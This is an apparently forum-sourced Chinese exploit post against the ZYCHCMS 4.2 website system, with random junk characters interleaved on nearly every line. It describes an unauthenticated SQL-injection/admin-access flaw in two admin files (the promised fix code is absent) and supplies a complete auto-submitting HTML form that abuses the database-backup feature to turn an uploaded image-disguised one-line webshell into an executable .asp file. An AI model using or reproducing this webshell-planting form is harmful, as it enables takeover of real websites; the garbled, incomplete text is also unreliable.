& ?# k7 o+ A" u( c( w, q3 w
. h* s+ B S" e$ m& g( ]7 I
& m5 ]4 A0 z' Z% m. S% ~( w, K8 }/ x c9 |0 J
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
6 Q% \& C+ B/ e0 E% N ①SQL注射漏洞2 Y0 h. B4 W M; Q$ U" U
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
; [2 I6 n) R0 [ Z1 V9 A 漏洞原因:未过滤
7 X1 f; E8 W: l& S8 D+ o 漏洞代码:8 t% h2 C7 j* O. C2 [8 j# {6 o, J
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。4 G; ?7 }( Q' o$ q9 d$ a( ?# p
修复方法:在文件开头加入代码4 V; H! A6 j5 y( R/ q$ N% H( o: _+ L
6 l+ U) m! z7 g" c2 ^
/ J+ ~: e; P$ t4 P
②后台拿WBSHELL( q, S7 U# M& {6 ^$ d
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。* ]! {/ K3 o9 z/ J6 M
这里在网上找了一个,改了下,将就着用。
2 ~3 ^9 k2 [# j1 a 以下是代码本地提交代码* D4 D& u; K/ S- H
4 |7 v+ E9 x( @7 }& Q
9 l% L* d* ~- @& U( f( L
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
& z8 S: }5 [* T# B7 P$ e; G <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
* E( Q! G. ~% v6 O/ v/ a <tr>
( r1 p/ I7 \* G k0 V <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>4 |. @6 Q! {) Y- x) d. g, U
</tr>$ M2 w/ t0 ?2 O2 Y0 N9 B6 J# x
<tr>) Q8 Q. R0 H5 v' g2 R2 Z( E4 V, m
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
7 b/ R9 d0 d5 G0 n2 c; Q& g5 t </span>
l( @6 q' U; D0 V# I' h <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
( |+ A( I9 C0 }/ e9 _7 @ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
9 J6 q, e q \* }# x, U <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>- ~# q4 n& a0 I( Z9 t
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d/ d+ Y: A! V: N, d( K
<div align=”left”>6 u% F0 o) q; \, s' D
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
( V8 ]9 i3 J4 w9 g$ }6 i <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>4 ]# V. J4 c! R
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />/ b- s1 Z6 Z$ r0 V5 H( h
</div></td>5 ^3 ~4 k }) A5 l6 Z7 |7 ]6 `
</tr>, ?% N' h; G3 R% ]4 r
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”># v h2 U6 q T8 w
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>; L4 ]) [0 l) L7 V5 ^
<td class=”td”><div align=”left”>+ x, a9 A7 ^. r; E: ?4 S5 j4 t; z
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />6 y B, N. m3 g0 H# ]% k
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>6 F) k5 o8 ]/ K. q6 z2 v% S5 Y, v
</tr>- F; O$ b. q' H ^% Q1 p
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>& d' J, V- ^" X' X
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
9 f( y" g- ]9 e: B0 C <td class=”td”><div align=”left”>
' }1 _ p2 K8 y0 p/ K+ X- ` <input type=”submit” value=”确定备份” class=”btn”( a: j$ l0 J+ r) v& f G. B
</div></td>
1 G9 `5 Q) Q( n/ f. U </tr>
! B$ \* _$ x U4 m# }8 m </table></td></tr></form>& w6 z( J1 K8 b5 h; E
</table>/ ?+ L. O" f# h' E7 R d$ L+ s
</td>- j! n) i- Q" w5 J0 c7 s
</tr>
( Z! e5 p& u w8 P# {# m </table>/ v0 L4 H: l' c& ^! e
<script>
! P, C) t9 G. l# o3 X: m document.all.add.submit();
* {2 f1 I1 O* ]) P2 P </script>/ ?% p! d6 q6 m/ o
* m$ J* o- b/ o+ Z' M# q; N( x
$ Y& g+ f+ d1 q1 n7 L2 D
) W. \, J1 Q6 B
' }6 p" K. c5 l0 N& Y
6 _( j# G# {% }1 l9 r, E0 i$ ?* a
" e3 Z! ]. K2 ^7 ?- }. d6 F q" F9 G2 |) t$ C
. A- D- T: E @, o
* p6 P J3 [ U) A
& X ` P$ ?) L2 y% B
|